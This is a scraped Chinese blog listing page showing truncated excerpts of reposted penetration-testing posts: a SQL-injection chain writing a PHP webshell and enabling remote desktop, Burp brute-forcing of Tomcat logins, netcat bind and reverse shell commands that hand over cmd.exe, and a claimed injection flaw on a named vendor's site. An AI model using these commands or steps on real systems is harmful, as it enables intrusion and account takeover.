自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

  • 博客(7)
  • 收藏
  • 关注

转载 模拟sql注入实现远程桌面登录

首先用sql注入文件命令y url+一句话 into outfile 绝对路径/test.php用蚁剑连接打开连接的终端先看用户的权限创建一个用户将它放入队列中查看3389端口是否开启0xd3d 16进制解码为3389打开远程桌面连接输入新建的用户和密码成功远程桌面连接转载于:https://www.cnblogs.c...

2019-08-26 20:42:00 286

转载 用burp爆破tomcat的过程

首先burp抓包,将抓到的包放到intruder中通过burp中自带的解码得知账号密码中有个“:“号所以我们选择的数据类型为Custom iterator第二条输入”:“将字典编码了对应爆破因为爆破的时候会将字符URL编码了,所以需要将那个选项去掉完成 爆破这里调整可爆破MD5加密的。转载于:https:/...

2019-08-20 11:55:00 762

转载 nc监控实现调用受害者cmd

正向连接受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网受害者:nc.exe -vlp 1234 -e cmd.exe攻击者 nc 192.168.1.1 1234nc -lvvp 80 直接监听内网所有主机80端口反向连接受害者 A 出于内网状态 192.168.1.25 攻击者 B 出于内网-外网的服务器 202.12.178.22受害者 nc....

2019-08-17 13:08:00 213

转载 用php简单区别泛解析

<?php  header('content-type:text/html; charset=utf-8');  $host = '58.com';  $hosts = gethostbyname('fuckfuck.'.$host)  if ($hosts != 'fuckfuck.'.$host){    fan($host,$hosts);}else{...

2019-08-14 20:24:00 165

转载 某毒霸网站存在信息泄露和sql注入

通过钟馗之眼搜索目标网站的证书使用者找到信息泄露的网站,点击上图中的edit会跳转手工注入sql发现有效that's all转载于:https://www.cnblogs.com/lighting--/p/11341660.html...

2019-08-12 17:59:00 75

转载 HTTP响应代码

100 Continue 这个临时响应表明,迄今为止的所有内容都是可行的,客户端应该继续请求,如果已经完成,则忽略它。 101 Switching Protocol 该代码是响应客户端的 Upgrade 标头发送的,并且指示服务器也正在切换的协议。 102 Processing (WebDAV) 此代码表示服务器已收到并正在处理该请求,但没有...

2019-07-29 20:21:00 116

转载 渗透测试--信息收集

一般渗透测试分为          信息收集          发现漏洞          利用漏洞          漏洞报告 我认为信息收集占整个渗透过程的60%,收集被攻击网站的资产,信息收集的越多越有利于后续发现漏洞和利用漏洞。 那么我整理了信息收集的过程:              1、查看被攻击网站是否有WAF(wafw00f -a 地址...

2019-07-26 22:19:00 160

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除